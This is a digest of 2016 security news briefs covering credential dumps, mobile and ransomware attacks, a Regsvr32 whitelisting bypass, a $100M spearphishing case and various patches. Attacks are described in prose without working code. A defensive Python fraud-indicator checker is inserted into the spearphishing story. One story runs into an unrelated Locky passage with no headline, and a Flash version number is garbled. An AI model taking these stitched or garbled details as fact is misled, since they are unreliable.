News Stories (May-05-2016)
--World Password Day: resources to help you on this special occasion (May-04-2016)
The 5th of May is World Password Day, the ideal opportunity to raise awareness of passwords with your organisation's staff and senior management.
This is the fourth year passwords have been honoured in this way. The event recurs annually on the first Thursday of May.
To help, we have compiled a few quick resources to help you make the most of this auspicious occasion.
The World Password Day website: here you can test the security of passwords, read advice and even watch videos about the importance of password security (1075 views on Youtube!) https://passwordday.org/
And Billy Austin, VP of security at LOGICnow, has shared a few tips on password safety:
Consider a Password Manager to store and generate passwords. Password Managers help employees generate sophisticated & unique passwords for each login.
Change all default passwords on vendor provided devices and applications. The most obvious example we can all relate to is the home wireless router where Admin is the login and 'Password' is the password.
Remove all account IDs and Passwords from terminated employees, avoiding unauthorized access. Today's plenitude of logins presents a challenge to IT while attackers see this as a potential backdoor into the crown jewels - your data.
Intel has written a blog about the day: https://iq.intel.com/celebrate-world-password-day-2016/
It even has its own hashtag on Twitter: https://twitter.com/hashtag/PasswordDay #PasswordDay
--Gmail, Yahoo email credentials among millions found on the dark web (May-04-2016)
Hold Security is reporting that one of its researchers discovered, and then acquired, a mega-size load of 272 million stolen email credentials from a hacker.
The security research firm said the batch came from a “Russian kid” that one of its analysts found who had gathered 1.17 billion stolen credentials, from Google, AOL, Yahoo and Mail.ru, from various places on the dark web. When Hold's team boiled this list down, comparing the newly acquired data to data already in its possession, it found 272 million of the email credentials were unique with 42.5 million having never been disclosed. The remainder were already known to be compromised.
In spite of the huge volume of records that were found, the price paid to the hacker by Hold Security is even more amazing.
The original asking price was 50 Rubles, less than $1, but Hold bargained the hacker down.
“In all reality, 50 rubles is next to nothing, but we refuse to contribute even insignificant amounts to his cause. It is rather funny to negotiate over this, but finally the hacker just asks us to add likes/votes to his social media page (so much for anonymity). That we can do, and once he is satisfied with the results we get a link to an incredible 10 gigabytes in a compressed database, which takes us more than an hour to download,” Hold wrote.
Industry experts put forth several reasons for the hacker giving away the data, ranging from it being a supply and demand issue to the fact that they were unverified and thus possibly worthless to a buyer.
“My guess is the credentials were either unverified or specifically stale (abandoned accounts, for instance). He probably gathered it from dumps of previous breaches of other vendors, so it's likely that he didn't do the work of stealing the data so much as he probably just garbage-collected it from around the web,” Lysa Myers, Security Researcher at ESET told SCMagazine.com in an email.
Jonathan Cran at Bugcrowd said in an email to SCMagazine.com the emails could still prove useful, but “the half life of stolen credentials is decreasing as SaaS providers such as mail.ru or Gmail get faster at invalidating them.”
“These kinds of mail credentials are useful for spammers and scammers who utilize accounts to spread malware and further their own access,” Myers pointed out.
--Mobile devices still vulnerable to attack, report (May-02-2016)
New mobile attacks can work around two-factor authentication on Android phones and inject malware onto iOS phones, according to a blog post from Check Point reporting on demonstrations at BlackHat Asia.
Attackers, the post said, can push rogue apps to Android devices of any Google services user. These allow the miscreants to steal incoming text messages. This despite a security feature put in place to block this scheme, namely deactivating the app's broadcast receivers – an Android API – until the user first opens the app.
Hackers get around this defense by replacing a bookmark in the user's devices with a URL redirecting to malicious activity, so attackers bypass two-factor authentication (2FA) and have no need to activate the malware. And, because the attack is launched from a compromised PC browser, access to the device itself is not needed.
In the case of iOS devices, by creating their own spoofed hotspots, attackers can brick devices running versions before 9.3, as these devices are programmed to connect automatically to known Wi-Fi hotspots. Once an iOS device is connected, it continually checks time and date settings via Network Time Protocol servers. Attackers can brick the device by resetting the time to 1.1.1970 (epoch zero), an old bug in iOS.
Another iOS vulnerability was demonstrated on non-jailbroken devices running uncertified code signed with a developer certificate. Using readily available open source tools, miscreants can install what appears to be a legitimate app, but in actuality has malware loaded in. When installed, the "bad" app will hide the icon of the legitimate app and so evade standard security protocols as well as dupe the user into accepting it.
The point, the Check Point researchers said, is to use advanced security solutions.
--New ransomware demands payment in iTunes, targets older Android software (Apr-26-2016)
A new malware type has been spotted in the wild that features a couple of original moves not seen yet by researchers: it is self-installing, and the cybercriminals require that the ransom be paid in iTunes gift cards.
Researchers at Blue Coat said the cybercriminals are using ELF, aka Towelroot, exploits along with some tools from the leaked Hacking Team exploit-kit inventory to spread Dogspectus ransomware. The download is achieved through malicious ads that are served onto the device through a series of redirections that usually start with a malvertising ad call, said Blue Coat researcher Andrew Brandt to SCMagazine.com in an email Tuesday.
What happens next caught Brandt by surprise. Instead of showing the usual “application permissions” dialog box that spurs the victim to act and thus download the malware, this malware simply installs itself.
“This is the first time, to my knowledge, an exploit kit has been able to successfully install malicious apps on a mobile device without any user interaction on the part of the victim,” Brandt wrote.
Brandt noted that devices running newer versions of Chrome, downloaded properly from the Play market, do not appear vulnerable, while those running out of date 4.x variants are susceptible. Blue Coat is continuing its research to see if the malware successfully infects newer versions of Android.
The attacks are believed to have begun in February.
Once installed and ready to act the ransomware displays an iTunes graphic claiming the device has been locked by a supposed law enforcement group such as the “America national security agency” or “Nation security agency” with the demand for $200 to be paid using iTunes gift cards.
The device is not encrypted, just locked, and if it is connected to a computer, photos, music and other files can be removed.
“Use of iTunes gift card codes is extremely unusual. Early ransomware asked for money transfers via Western Union moneygram, then they all switched over to Bitcoin. This is the first ransomware I've seen that asks for this specific type of gift card to be used for payment,” Brandt said.
--Info on 1.2M BeautifulPeople.com users sold on dark web after breach (Apr-26-2016)
The personal information of 1.2 million members of the “exclusive” dating site BeautifulPeople.com has surfaced for sale on the dark web following a breach that occurred last year.
Haveibeenpwned creator Troy Hunt spotted the information, including names, passwords, sexual orientations, beauty ratings, dates of birth, drinking habits, education levels, email addresses, income levels, job titles, and other data, according to haveibeenpwned.
BeautifulPeople.com told SCMagazine.com in an emailed statement that the information for sale is from the initial breach and only involves data that was provided by members prior to mid-July 2015.
“All impacted members are, of course, being notified once again,” the statement said.
MacKeeper Security Researcher Chris Vickery, who initially discovered the data on an exposed company server in December 2015, told SCMagazine.com via email comments that the information was unprotected and accessible by an IP address when he found it.
He said the dating website simply published an open database into the world that was accessible to anyone with the IP address.
“The malicious people that have been selling it probably found the very same server and downloaded it directly from BeautifulPeople,” he said.
The dating website said that they are only aware of two security researchers, presumably Hunt and Vickery, accessing the data when the breach was reported to them last year.
BeautifulPeople.com initially said only “test servers” were compromised, according to Wired, but Vickery suggested this was done only to make the breach sound “less severe.”
“The server may have indeed been a 'test,' BUT they put real data into this 'test' server,” Vickery said.
Threat actors are sending the malicious downloaders using malicious .zip and .rar files disguised as invoices, corporate documents, tax information, and other seemingly benign files in order to spread the new downloader.
The new downloader is written in "more compact" script coding that allows attackers to encrypt the malicious code into .zip or .rar files multiple times, InfoArmor's chief intelligence officer, Andrew Komarov, told SCMagazine.com.
The malicious code bypasses anti-spam filters and anti-virus software through obfuscation, Komarov said.
Those behind the Locky malware didn't design the malicious downloaders but obtained them from a third party, he said, noting that 50 unique malicious downloaders can be purchased for between $1 to $25, making them an inexpensive way to spread the ransomware.
FireEye researchers observed the new downloader using a custom network communication protocol which, in their tests, only downloaded the Locky ransomware as its payload, according to an April 22 blog post.
The researchers went on to say that the downloader could be a new platform for installing other malware or for “pay-per-install” malware distribution.
--Report: Ransomware feeds off poor endpoint security (Apr-26-2016)
Poor endpoint security practices are only helping to propel the great ransomware epidemic of 2016—and if allowed to fester, this threat will spread to new vulnerable endpoints including IoT devices, cars and ICS and SCADA systems, according to a new report from the Institute for Critical Infrastructure Technology (ICIT).
The report, released last week, recommends adopting holistic endpoint security solutions—including signature-based and behavior-based anti-malware software, firewalls and intrusion detection and protection systems—as part of a multi-layered approach toward IT security. “Of the lines of network defense available to an organization, endpoint security is uniquely capable of stemming the growing ransomware menace,” the report reads.
ICIT warned that organizations become too easily disillusioned with endpoint solutions whenever they fail to thwart a systems breach within their industry. When this happens, security execs tend to look to bolster defenses elsewhere in the network.
In truth, however, endpoint security solutions remain a critical component of good IT fortification, just not by themselves, the report explains. “The biggest misconception of endpoint security is that it is the only solution needed. EPS is but one of the many pieces needed to reduce the potential of a system compromise,” Kevin Chalker, CEO of GRA Quantum, said in the report.
“The endpoint aspect is just a part of a layered security strategy; there's no silver bullet, although every time there's a big breach, charlatans come out of the woodwork selling a silver-bullet solution,” said James Scott, co-founder of and senior fellow at ICIT, in an interview with SCMagazine.com.
Some organizations also eschew endpoint solutions because they falsely believe they don't have data worth stealing on their network, the report continues. But the beauty of ransomware is that the affected data doesn't have to hold value to the cybercriminal—it need only hold value to the impacted company that desperately needs access to it.
Ryan Brichant, CTO of ICS at FireEye, an ICIT fellow, posited in an interview with SCMagazine.com that endpoint security technology has been around for so long that “it's not the sexy security sell,” while Malcolm Harkins, global CISO at Cylance and also an ICIT fellow, told SCMagazine.com he thinks that IT execs view older, traditional endpoint solutions as products that “deteriorate the user experience.”
ICIT predicted that ransomware, if left unchecked, will continue to propagate in new ways. For instance, the report says it “seems likely” that by the beginning of the second half of 2016, there will be a notable public case of bad actors using ransomware as a decoy, distracting the victim's IT resources while secretly exfiltrating sensitive data from affected machines. In such a scenario, the valuable data is the true end game, while the ransom—if ever paid—is essentially a bonus. “A lot of times we're seeing chatter on dark web forums that the most sophisticated [cybercriminals] don't care about getting the ransom paid” in a case such as this, said Scott.
The report also foresees ransomware locking up industrial control and SCADA systems in the near future. (SCADA—or Supervisory Control and Data Acquisition—systems enable the remote monitoring and control of industrial processes.) These operations technology (OT) systems are particularly vulnerable, as they are generally antiquated, and thus not equipped to thwart the latest cutting-edge threats. The difference between IT systems and OT systems, said Brichant, is that while IT systems are vulnerable to zero-day threats, OT systems are susceptible to “zero-decade threats.”
“The chances of us already having had a [ransomware] attack on these infrastructures are high,” Brichant added. It's just a matter of whether or not the affected industrial organization is willing to divulge the attack.
“I'm surprised that hasn't happened yet, frankly,” added Harkins, also referring to a ransomware attack on an ICS or SCADA system.
The report also predicted future ransomware attacks on IoT devices and Internet-connected cars. “Let's say I've got an electric ignition and… now I can't start my car until I've paid in bitcoin,” he said, envisioning one possible ransomware scenario. “Or let's say I've got traditional keys, but the car uses a passcode or fob or my fingerprint to unlock the door.” A cybercriminal could theoretically take control of the locking mechanism and forbid entry until the ransom was paid, Harkins added.
--Microsoft vulnerability lets hackers bypass app whitelisting protections (Apr-25-2016)
A researcher has discovered a way for attackers to sneak remotely hosted, unauthorized applications—more specifically, COM (Component Object Model) objects—past Microsoft Windows' whitelisting security feature AppLocker, by abusing the command-line utility Regsvr32.
Normally, Regsvr32 allows users to register Dynamic Link Library (DLL) files and ActiveX controls, but on his blog, Colorado-based researcher Casey Smith recently explained that hackers can place a malicious script block inside the registration tag, and then have Regsvr32 successfully execute the code. The trick works on the business editions of Windows 7 on up.
No administrator access is required to perform this workaround, and the process does not alter the system registry, making this vulnerability-based hack a difficult one to detect.
--Researcher finds backdoor that accessed Facebook employee passwords (Apr-23-2016)
A Taiwan-based security researcher, known as "Orange Tsai," who was awarded a $10,000 bug bounty in February published a report detailing the exploits that led to his discovery of illicit code on a Facebook server.
A consultant at the security firm Devcore, Orange Tsai said he discovered malware that provided access to Facebook employees' passwords, which had been used by a remote attacker to gain access to employee emails and shared files.
The accessed information appears not to have compromised Facebook users. The researcher wrote that he noticed that Facebook's server used Accellion's web-based Secure File Transfer service, a web application that, while popular among large companies like Facebook, has previously been found to contain serious security issues.
This caught the researcher's attention, and led him to look for potential vulnerabilities in the file transfer application. He ultimately discovered several vulnerabilities, including a SQL injection flaw that enabled remote code execution. Accellion patched the vulnerability in February.
A member of Facebook's security group wrote on Hacker News that Facebook did not have full control of the software, so it was run isolated from systems that host the company's user data. “We do this precisely to have better security,” wrote Reginaldo, the Facebook employee. “After incident response, we determined that the activity Orange detected was in fact from another researcher who participates in our bounty program.”
Once Orange Tsai gained access to Facebook's server, he explored the web server log files and noticed an unusual traffic pattern, which led to his discovery of the illicit code.
Reginaldo at Facebook continued, “After incident response, we determined that the activity Orange detected was in fact from another researcher who participates in our bounty program. Neither of them were able to compromise other parts of our infrastructure so, the way we see it, it's a double win: two competent researchers assessed the system, one of them reported what he found to us and got a good bounty, none of them were able to escalate access.”
The situation is reminiscent of another incident Facebook faced last year, in which the company claimed that security researcher Wesley Wineberg unethically exploited a flaw to escalate another vulnerability.
In speaking with SCMagazine.com, Wineberg, a security consultant at Synack, said, “This researcher did exactly what I did.” However, the company has since updated its policy to explicitly prohibit researchers from escalating exploits in this way.
Wineberg said he finds it encouraging to see that “they are changing how they deal with researchers.”
--Cytegic finds ties between terror and cyberattacks (Apr-20-2016)
The terror attacks that struck Belgium and France also kicked off a period of increased cyber attack activity in both countries, according to a report by Cytegic.
The research firm's March intelligence report confirmed the company's prediction that cyber attacks would rise in these nations. Cytegic found political activist groups, like Anonymous, were the most active, followed by nation-states and cyber-terrorists or those affiliated with ISIS.
The most targeted industries after the attacks were government, media, banking, finance, critical infrastructure and defense. Cytegic noted that after the Brussels incident the primary actors were financial hackers, political activists, political cyber warriors and cyber terrorists. This was very similar to what happened after the November 2015 Paris incident.
“Our analysis not only confirmed our thesis regarding the effect the Brussels attacks had on the cyber-activity within Belgium, but it also revealed it resonated throughout the world, especially in North America,” Cytegic wrote.
--Report: Canada police decrypted a million BlackBerry messages (Apr-18-2016)
As part of its investigation into a 2011 murder, the Royal Canadian Mounted Police (RCMP) intercepted and decrypted around one million PIN-to-PIN BlackBerry messages, according to Vice News.
Court documents in the case revealed the extent of cooperation between BlackBerry Limited, formerly known as Research In Motion Limited, as well as telecommunications giant Rogers. The RCMP set up a server to intercept messages. BlackBerry's master key was then applied to decrypt the messages.
While the exact details of where the piece of code used to decrypt messages originated remain unclear, Crown prosecutors revealed the RCMP had access to the key since 2010. Lawyers for the government attempted in court for two years to prevent the information from becoming public.
While privacy advocates question the legal authority compelling service providers to cooperate with police in carrying out court orders, such as wiretaps and search warrants, it's unknown whether the RCMP maintains its surveillance capabilities.
--Report: Cybersecurity new atom bomb, says Apple co-founder Steve Wozniak (Apr-18-2016)
Cybersecurity is the greatest threat since the atom bomb, Apple co-founder Steve Wozniak said in an interview on the Australian TV news show Lateline.
And, he said, the threat is "getting worse and worse year by year."
In a wide-ranging interview, the man who in the early 1970s developed the first Apple computers with Steve Jobs, said, "Could they really take out our electrical system, turn off our internet?"
He also lamented the loss of privacy, saying the U.S. government's attempt to force Apple to decrypt the cell phone used by one of the San Bernardino killers was wrong.
"What if the FBI was able to go to any company any time they felt like it and said you have to build a product our way?" he said on Lateline.
Wozniak left his R&D role at Apple in the 1980s. He is now an adjunct professor at the University of Technology Sydney.
--Report: Feds staying mum on possible Firefox vulnerability (Apr-15-2016)
Experts are speculating that the FBI may be closely guarding a secret vulnerability in the Firefox browser that it can exploit for future law enforcement purposes, according to a Motherboard report yesterday.
The article refers to a network investigative technique that the FBI used to hack visitors of the Playpen child pornography website. That site runs on the encrypted Tor network, but an exploit that works on the Tor browser would also work just as effectively on Firefox, upon which Tor was built.
So far the U.S. Department of Justice has resisted a U.S. district court order to disclose the technique. In an interview with Motherboard, Christopher Soghoian, principal technologist at the American Civil Liberties Union (ACLU), said that by not disclosing the alleged vulnerability in such a popular global browser, “The government is essentially choosing to keep hundreds of millions of people vulnerable in case a few of them turn out to be criminals later.”
--The anatomy of a spearphishing scam, or how to steal $100M with a fake email (Apr-15-2016)
A lawsuit filed on April 14 by U.S. Attorney for the Southern District of New York Preet Bharara gives an insider's view on how frighteningly easy it is for a company to be duped out of a huge sum of money. In this case, almost $100 million.
The civil forfeiture lawsuit was filed in federal court in New York City and is being brought on behalf of an unidentified American company that was suckered out of $98.9 million over a four-week period late last summer. Luckily, the majority of the money has already been recovered and this suit is specifically going after the remaining $25 million that is being held in at least 20 overseas banks, according to court documents.
“This is more than twice as large as any reported loss that we have seen,” Ryan Kalember, Proofpoint's vice president of Cybersecurity Strategy, told SCMagazine.com in an email Friday.
What this case perfectly illustrates is the step-by-step process a criminal can take implementing such a scam and all of the warnings that were ignored by the victim.
Considering the massive pile of money involved, the scheme itself was extremely simple and used by cybercriminals every day, albeit to normally steal smaller amounts of plain old data. It was a classic spearphishing attack.
According to Bharara's suit, the scam was initiated around Aug. 10, 2015, when the victimized company received an email purportedly from an Asia-based vendor with which it had frequently done business in the past. The email in question carried the name D Talan, AR and was not picked up by the victim company itself. Instead it came to an email address set up and monitored by an outside firm hired by the victim to deal with its vendors and other payees.
The initial email from Talan simply asked for some background information regarding its billing history with the victim. This information was supplied on August 11, and that same day a follow-up email was received by the victim's payment partner from Talan informing the company that the “vendor's” banking information would be changing and that they wished to know whom to contact at the victim company to make the change so any payments would go to the correct account. On August 17 Talan gave the victim's payment partner the new account information and it was placed into the victim's system.
Starting around August 21 the payment partner began sending a series of 16 payments to the new, fraudulent account, as part of its usual business. All appeared to be going well when on September 14 both the victim and its payment company received word from the real vendor that it had not received any payments starting August 22, or the day after Talan's account information was input into the system.
A quick investigation ensued and when Talan's email was studied it was quickly discovered to have several irregularities, including a @mail.md domain instead of the vendor's corporate domain name. In addition, it indicated that the domain was hosted in Moldova, far from the vendor's true location in Asia.
The final indicator that something was amiss was that the funds were deposited into a Eurobank facility in Cyprus, and not at a bank in the vendor's home nation.
If any of these indicators had been flagged from the start the entire scam would have been stopped in its tracks.
“Employees should be suspicious if they receive a request for unusual information or a wire transfer via email, even if it appears to come from a high-level executive. Check the reply-to email address and always call to confirm. If a vendor changes their wiring instructions over email, call them to confirm. If the CEO requests a significant transfer that is unusual, call him or her to confirm it. If the email header has a warning from your email security system, such as a subject like [BULK] or [SUSPICIOUS], then contact the vendor directly on the phone, do not enter the invoice for payment,” Kalember said.
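A payments-side check for the indicators this case turned up (sender domain not the vendor's corporate domain, domain hosted far from the vendor, new bank in a different country, gateway-tagged subject, and any banking change arriving by email), written as an added example that is not from the court filing or from Proofpoint. The vendor record and both emails are constructed, and the hosting country of the sender's domain is assumed to come from an external WHOIS/GeoIP lookup and is passed in as a field:

```python
"""Flag a vendor payment-change email against the vendor record on file.
Added example with constructed data; not from the court filing or any real vendor."""
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Vendor:
    name: str
    domain: str          # vendor's known corporate email domain
    country: str         # ISO country code where the vendor is based
    bank_country: str    # country of the bank account already on file


@dataclass
class PaymentEmail:
    sender: str
    reply_to: str
    subject: str
    body: str
    sender_domain_country: str              # where the sender's domain is hosted (assumed external lookup)
    new_bank_country: Optional[str] = None  # country of any proposed new account


SUSPICIOUS_TAGS = ("[BULK]", "[SUSPICIOUS]")
# Loose match for "our banking information / wire instructions will be changing".
BANK_CHANGE_RE = re.compile(
    r"(bank|wire|account|remit).{0,80}(chang|updat|new)", re.IGNORECASE | re.DOTALL)


def domain_of(address: str) -> str:
    """Return the lower-cased domain part of an email address ('' if malformed)."""
    _, sep, domain = address.rpartition("@")
    return domain.lower() if sep else ""


def assess(vendor: Vendor, email: PaymentEmail) -> List[str]:
    """Return the indicators that fired for this email (empty list means clean)."""
    findings = []
    if domain_of(email.sender) != vendor.domain.lower():
        findings.append("sender_domain_mismatch")
    if domain_of(email.reply_to) != domain_of(email.sender):
        findings.append("reply_to_mismatch")
    if email.sender_domain_country != vendor.country:
        findings.append("sender_domain_hosted_abroad")
    if any(tag in email.subject.upper() for tag in SUSPICIOUS_TAGS):
        findings.append("gateway_flagged_subject")
    if BANK_CHANGE_RE.search(email.body):
        findings.append("bank_change_requested")
        if email.new_bank_country and email.new_bank_country != vendor.bank_country:
            findings.append("new_bank_country_mismatch")
    return findings


def decision(findings: List[str]) -> str:
    """Handling decision: any emailed bank change is held for a phone call, full stop."""
    if "bank_change_requested" in findings:
        return "hold: confirm by phone with the vendor contact already on file"
    if findings:
        return "review: verify the sender before acting"
    return "proceed"


# Constructed vendor record and two constructed emails modelled on the case above.
VENDOR = Vendor("Example Supplies", "vendor.example", "SG", "SG")

LEGIT = PaymentEmail(
    sender="ar@vendor.example", reply_to="ar@vendor.example",
    subject="Invoice 4471", body="Please find attached invoice 4471 for July.",
    sender_domain_country="SG")

SPOOFED = PaymentEmail(
    sender="ar-dept@mail.md", reply_to="ar-dept@mail.md",
    subject="[SUSPICIOUS] Banking information update",
    body="Our banking information will be changing. Who should we contact "
         "to update the account for future payments?",
    sender_domain_country="MD", new_bank_country="CY")

if __name__ == "__main__":
    for label, mail in (("legit", LEGIT), ("spoofed", SPOOFED)):
        fired = assess(VENDOR, mail)
        print(label, fired, "->", decision(fired))
```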
A U.S. magistrate working with Eurobank quickly froze the Cypriot account stopping about $74 million of the stolen money from moving out.
This was an extremely lucky and somewhat rare occurrence, as most wire transfers, once completed, are tough to reverse.
“Recovering money can be difficult if sent by wire, as the transaction may be irreversible within a short time window. There have been many variations of these scams in the past and they have been going on for some time. Luckily, international law enforcement has been taking note of these scams to better monitor, mitigate the financial losses and arrest the criminals responsible,” Terrence Gareau, chief scientist of Nexusguard, told SCMagazine.com in an email.
The victim was not so lucky with its remaining funds because the bad guys had almost immediately moved them from Eurobank and spread them around to 19 other banks to help duck authorities.
The court document did indicate that U.S. authorities know where those accounts are located with one being in Estonia.
--Facebook scam promises friend's video, delivers malware instead (Apr-14-2016)
A new spam campaign tries to fool Facebook users into downloading malware by luring them to a fake YouTube page supposedly featuring a friend's video.
According to a scam alert from research firm ESET, victims receive either a false notification that they were tagged in a friend's timeline post, or a message purportedly sent by a friend via Messenger.
Typically titled “My first video,” “My video,” or “Private video,” the fake message compels users to click on a link that sends them to the phony YouTube website. There, the user is instructed to install a plug-in to view the content—but it's actually malware that fills the victim's wall with fake videos and sends the same “My first video” messages to that person's friends, further propagating the threat.
To eliminate the threat, ESET advises victims to remove the plug-in, disguised as a “Make a GIF” app, from their browsers. Currently, the threat only impacts users of Google Chrome.
--New GozNym banking malware steals millions in just days (Apr-14-2016)
A new banking trojan named GozNym is actively hitting U.S. and Canadian banks and has already taken about $4 million from two dozen North American banks.
IBM's X-Force Research team reported that 24 banks in the two countries, 22 in the U.S., have so far lost about $4 million to attacks using GozNym since the malware was discovered earlier this month. Who conducted the attacks is not known.
Limor Kessem, executive security advisor for IBM, wrote in a blog that GozNym was created by combining some of the source code from the older Nymaim and Gozi ISFB banking malware to create an even more dangerous piece of software.
“From the Nymaim malware, it leverages the dropper's stealth and persistence; the Gozi ISFB parts add the banking Trojan's capabilities to facilitate fraud via infected Internet browsers," said Kessem. "The end result is a new banking Trojan in the wild.”
Attacks are so far pretty evenly split with business banks absorbing 28 percent of the attacks; credit unions, 27 percent; e-commerce 22 percent; retail banking, 17 percent; and the remaining six percent were in other types of institutions.
GozNym uses its native Nymaim ability to infiltrate its targets through an exploit kit which drops a payload into the system that uses two executables for the infection routine, IBM said.
Giovanni Vigna, co-founder and chief technology officer of Lastline, told SCMagazine.com in an email Thursday that malware like GozNym is to be expected now.
“While it is interesting to see two strands of malware becoming closely intertwined, it is not surprising. As for any software that has to be flexible and reliable, malware has been modularized for a while, so that functionality can be reused or loaded as-needed.”
One industry executive said it was disappointing that GozNym has been successful because, while this malware is new, the type of attack has been seen before and the banking industry was told to beware.
“When you see an attack like GozNym picking up pieces of past malware to swipe another $4 million, it stings if you're a security professional. You know you told both IT and the business how they needed to react to attacks of this type when the original threats emerged. This just shows you that they didn't really listen then,” Jonathan Sander, vice president at Lieberman Software, told SCMagazine.com in an email Thursday.
Sander described this lack of concern as similar to that of a home that is constantly broken into through an open window because the owner refuses to remember to lock it.
--Patch Tuesday: Microsoft addresses Badlock Bug, issues 13 bulletins (Apr-12-2016)
Microsoft's April Patch Tuesday update contained 13 entries, six rated critical and the remaining seven, including the fix for the BadLock Bug, rated important.
The bulletins, which address 31 specific vulnerabilities, all deal with problems that could result in remote code execution, elevation of privilege, denial of service or a security feature bypass if left unpatched.
The critical-rated bulletins are MS16-037, MS16-038, MS16-039, MS16-040, MS16-042 and MS16-050 with each potentially allowing remote code execution.
While the BadLock Bug grabbed many of the headlines on this Patch Tuesday, most industry insiders did not see it as Microsoft's most pressing problem.
“Although the bug on everyone's mind going into Patch Tuesday has been BadLock, this should probably not be at the top of any patch priority index by a long shot. The top priority for Windows administrators should be to protect against vulnerabilities that can be exploited through web sites or documents. This means that IE/Edge, Office, and graphics components should demand top attention especially since they all address flaws rated as more likely to be exploited,” said Tripwire researcher Craig Young to SCMagazine.com in a Tuesday email.
Qualys CTO Wolfgang Kandek noted that this batch of patches fixes two zero-day threats, included in bulletin MS16-039.
“The two 0-days are contained with the Windows portion and both allow for the escalation of privilege from a normal user to administrator. In real life they will be paired with an exploit for a vulnerability that gets the attacker on the machine such as the Flash Player flaw from APSB16-10 that Microsoft addresses in MS16-050,” Kandek said to SCMagazine.com in an email.
MS16-042 also drew Kandek's attention. This bulletin addresses four issues in Office and, in addition to applying the patches, he suggested administrators ban RTF emails from Outlook.
Lane Thomas, of Tripwire's Vulnerability and Exposure Research Team, called out bulletin MS16-049, rated important, as one system administrators should closely examine.
“What makes this bulletin interesting is that it addresses a vulnerability found within the HTTP 2.0 protocol stack. HTTP 2.0 is a very new protocol and I have personally been waiting to see new vulnerabilities in its implementation,” Thomas said in an email to SCMagazine.com.
The final patch that garnered industry attention was MS16-050, which addressed vulnerabilities in Flash Player. Adobe also issued a patch.
--Report warns of self-propagating ransomware (Apr-12-2016)
Researchers at Cisco's Talos Security Intelligence and Research Group published a new report on the next phase of ransomware. Noting trends emerging among recent ransomware strains, the researchers expect to soon see a new era of self-propagating ransomware, or “cryptoworms.”
While ransomware strains have typically cast a wide net through mass phishing campaigns or similar methods, recent ransomware campaigns have employed more targeted strategies, specifically pursuing enterprise networks and healthcare institutions.
The Ransomware: Past, Present, and Future report, co-authored by Talos security outreach manager Craig Williams and manager of ICS research Joe Marshall, referenced an earlier Talos study of SamSam ransomware's propagation method: the ransomware infects entire servers and then spreads across networks. Speaking with SCMagazine.com, Joe Marshall, security research manager at Talos, said, “SamSam is the proof of ransomware's evolution to its logical next step.”
Talos security outreach manager Craig Williams noted that SamSam was designed to be “effectively hands-free,” but said the fact that its creators chose to take advantage of two well-known network vulnerabilities – one of the vulnerabilities is nine years old and the other is seven years old – shows that ransomware can get far more sophisticated.
“We believe that this is a harbinger of what's to come -- a portent for the future of ransomware,” the Ransomware: Past, Present, and Future report stated.
The researchers reported rising ransom prices, citing estimates that Angler exploit kit operators generate $60 million per year in ransom payloads, but warned that “Ransomware operators are increasing the stakes.”
This figure stands in stark contrast to earlier figures. A section chief at the FBI's Cyber Division said 2,453 ransomware attacks were reported in 2015, costing the victims $24.1 million.
Recent attacks targeting healthcare facilities, such as the reported ransomware incident that took Medstar Health offline last month, are demanding larger payouts. Attacks like these prompted the U.S. Department of Homeland Security (DHS), in collaboration with the Canadian Cyber Incident Response Centre (CCIRC), to issue a ransomware alert.
“It's almost child's play. You only have to spin them up, and let them go,” said Marshall. “There's a plethora of the vectors the ransomware can utilize.”
Last month, researchers discovered a new version of TeslaCrypt ransomware, featuring stronger encryption algorithms and an ability to extract more data from computer files.
Williams said they have confirmed that ransomware victims are not consistently getting the keys that they purchase and said victims cannot always trust the integrity of the data they get back. “It's astonishing to me that paying the ransom is still being encouraged as a magical quick fix solution for business owners,” he said.
--Cyberattack glitch exposes new strain of Qbot malware (Apr-12-2016)
The malware Qbot relies on stealth to secretly steal victims' credentials, but an unexpected glitch during a recent cyberattack alerted researchers to a new campaign featuring a more virulent strain of the software.
According to a white paper and corresponding release, BAE Systems discovered a new variant of Qbot — the original dates back to 2009 — featuring significant modifications to avoid detection, including:
polymorphic code that disguises Qbot's coding signatures
automated updates that generate new encrypted versions every six hours to outpace software updates
the ability to identify sandbox environments to thwart malware researchers
BAE determined the Qbot variant has infected more than 54,000 PCs globally. However, the plot was uncovered when the malware caused several Windows XP-based computers at a public sector organization to crash. “The criminals tripped up because a small number of outdated PCs were causing the malicious code to crash them, rather than infect them,” said Adrian Nish, BAE's head of cyber threat intelligence, in a company statement.
--Adobe updates Flash Player patching active zero-day vulnerability (Apr-08-2016)
Adobe issued an update to Flash Player Thursday night to fix an active zero-day vulnerability, along with several other critical issues.
This is the second month in a row that Adobe has had to roll out an out-of-schedule update to fix an active flaw in Flash Player. The update covers 24 vulnerabilities, with one, CVE-2016-1019, known to be actively exploited on systems running Windows 10 and earlier with Flash Player version 126.96.36.1996 and earlier.
The CVE-2016-1019 vulnerability was spotted in the Magnitude Exploit Kit by Proofpoint researcher Kafeine and is capable of allowing remote code execution. In a lucky twist, Proofpoint noted that while the new exploit could theoretically work on any version of Flash, only older versions had been targeted.
“In other words, equipped with a weapon that could pierce even the latest armor, they only used it against old armor, and in doing so exposed to security researchers a previously unreported vulnerability. We refer to this type of faulty implementation as a “degraded” mode, and it is something that we have observed in the past with CVE-2014-8439 and CVE-2015-0310 in Angler,” Kafeine wrote.
The problems affect Windows, Macintosh, Chrome and Linux. Adobe announced on April 5 that it would issue the patch and recommends anyone using Flash upgrade to the latest version as soon as possible.
--Pros examine Mossack Fonseca breach: WordPress plugin, Drupal likely suspects (Apr-08-2016)
Nearly a week after the Panamanian law firm Mossack Fonseca sent an alert to the firm's ultra high-net-worth clients announcing that the firm's email server was breached, a cybersecurity executive says his firm has pieced together the details of how the breach of 2.6 terabytes of confidential documents may have occurred.
Mossack Fonseca's main website currently runs an outdated version of Revolution Slider, a WordPress plugin that could grant a remote attacker a shell on the web server, said Feedjit CEO Mark Maunder, in speaking with SCMagazine.com.
Maunder said his team assessed Mossack Fonseca's IP history and discovered that the firm's website IP was on the same network as its mail servers. The law firm's website was wide open until a month ago and would have been “trivially easy” to exploit, he wrote on Wordfence.com, in a security update. Wordfence is a WordPress security plugin produced by Feedjit. The update also mentioned that the law firm's web portal accessed by clients reportedly used a vulnerable version of Drupal.
An industry source told SCMagazine.com that Mossack Fonseca's website is “riddled with unpatched vulnerabilities.”
